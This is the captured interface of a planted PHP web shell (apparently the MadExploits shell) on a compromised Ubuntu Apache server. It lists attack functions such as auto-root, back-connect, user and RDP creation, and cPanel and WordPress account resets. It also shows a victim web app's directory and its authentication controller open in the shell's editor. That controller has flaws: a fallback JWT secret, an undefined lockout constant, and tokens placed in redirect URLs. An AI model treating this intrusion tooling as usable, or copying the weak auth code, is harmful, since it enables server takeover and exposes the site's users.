Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
greenpreneurs /
[ HOME SHELL ]
Name
Size
Permission
Action
api
[ DIR ]
drwxr-xr-x
client
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
.env
733
B
-rw-r--r--
.gitignore
257
B
-rw-r--r--
ER Diagram.png
140.24
KB
-rw-r--r--
README.md
20
B
-rw-r--r--
auth.controller.js
5.83
KB
-rw-r--r--
database.sql
15.31
KB
-rw-r--r--
nohup.out
1.36
KB
-rw-------
package-lock.json
91.93
KB
-rw-r--r--
package.json
846
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : auth.controller.js
// api/controllers/auth.controller.js import pool from "../config/db.js"; import { validationResult } from "express-validator"; import speakeasy from "speakeasy"; import jwt from "jsonwebtoken"; import crypto from "crypto"; const JWT_SECRET = process.env.JWT_SECRET || "your_jwt_secret"; const TOKEN_EXPIRY = "1h"; const LOCK_THRESHOLD = 5; const LOCK_DURATION_MS = 15 * 60 * 1000; // 15 minutes // Utility: send validation errors const handleValidation = (req, res) => { const errors = validationResult(req); if (!errors.isEmpty()) { return res.status(400).json({ errors: errors.array() }); } }; // POST /api/auth/register export const register = async (req, res) => { // Validate inputs handleValidation(req, res); const { name, email } = req.body; try { // Check existing const [rows] = await pool.query( "SELECT CID FROM userdata WHERE Email = ?", [email] ); if (rows.length) { return res.status(400).json({ message: "Email already registered" }); } // Generate TOTP secret const secret = speakeasy.generateSecret({ length: 20 }); // Generate 8 backup codes (4-digit alphanumeric) const backupCodes = Array.from({ length: 8 }, () => crypto.randomBytes(3).toString('hex').toUpperCase() ); // Hash backup codes for storage const hashedBackup = backupCodes.map(code => crypto.createHash('sha256').update(code).digest('hex') ); // Insert user await pool.query( `INSERT INTO userdata (CID, Name, Email, totp_secret, is_2fa_enabled, created_at, backup_codes) VALUES (UUID(), ?, ?, ?, 0, NOW(), ?)`, [name, email, secret.base32, JSON.stringify(hashedBackup)] ); // Return QR and plain backup codes const otpAuth = speakeasy.otpauthURL({ secret: secret.base32, label: `IP-Climate:${email}`, encoding: 'base32' }); return res.json({ otpAuth, backupCodes }); } catch (err) { console.error(err); return res.status(500).json({ message: "Server error" }); } }; // POST /api/auth/login export const login = async (req, res) => { const { email, token } = req.body; // Simple input checks if (!email || !/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email) || !token || !/^\d{6}$/.test(token)) { return res.status(400).send('Invalid input'); } try { const [rows] = await pool.query( 'SELECT * FROM userdata WHERE Email = ?', [email] ); if (!rows.length) { return res.status(401).send('Invalid credentials'); } const user = rows[0]; // Account lockout check if (user.locked_until && new Date(user.locked_until) > new Date()) { return res.status(403).send('Account locked. Try again later.'); } // Verify TOTP const valid = speakeasy.totp.verify({ secret: user.totp_secret, encoding: 'base32', token, window: 1 }); if (!valid) { // Increment failed_attempts and possibly lock const fails = user.failed_attempts + 1; const lockUntil = (fails >= LOCK_THRESHOLD) ? new Date(Date.now() + LOCK_DURATION) : user.locked_until; await pool.query( 'UPDATE userdata SET failed_attempts = ?, locked_until = ? WHERE CID = ?', [fails, lockUntil, user.CID] ); return res.status(401).send('Invalid code'); } // Reset failures, mark 2FA enabled, update last_login await pool.query( `UPDATE userdata SET failed_attempts = 0, locked_until = NULL, is_2fa_enabled = 1, last_login = NOW() WHERE CID = ?`, [user.CID] ); // Issue JWT const jwtToken = jwt.sign({ id: user.CID, email: user.Email, name: user.Name }, JWT_SECRET, { expiresIn: TOKEN_EXPIRY }); // Build redirect query const params = new URLSearchParams({ token: jwtToken, name: user.Name, profilePic: user.ImageURL || '', CID: user.CID, email: user.Email, isAdmin: user.isAdmin ? '1' : '0' }); // Return callback URL for client redirection return res.json({ redirectUrl: `/callback?${params.toString()}` }); } catch (err) { console.error('Login error:', err); return res.status(500).send('Server error'); } }; // POST /api/auth/backup export const verifyBackup = async (req, res) => { handleValidation(req, res); const { email, backupCode } = req.body; try { const [rows] = await pool.query(`SELECT * FROM userdata WHERE Email = ?`, [email]); if (!rows.length) return res.status(404).json({ message: "User not found" }); const user = rows[0]; const codes = JSON.parse(user.backup_codes || '[]'); const hash = crypto.createHash('sha256').update(backupCode).digest('hex'); if (!codes.includes(hash)) { return res.status(401).json({ message: "Invalid backup code" }); } // Remove used code const newCodes = codes.filter(c => c !== hash); await pool.query(`UPDATE userdata SET backup_codes = ? WHERE CID = ?`, [JSON.stringify(newCodes), user.CID]); // Issue JWT const jwtToken = jwt.sign( { id: user.CID, email: user.Email, name: user.Name }, JWT_SECRET, { expiresIn: TOKEN_EXPIRY } ); // Return callback URL for backup login const params = new URLSearchParams({ token: jwtToken, name: user.Name, profilePic: user.ImageURL || '', CID: user.CID, email: user.Email, isAdmin: user.isAdmin ? '1' : '0' }); // Use relative path for callback on backup login return res.json({ redirectUrl: `/callback?${params.toString()}` }); } catch (err) { console.error(err); res.status(500).json({ message: "Server error" }); } };
Close
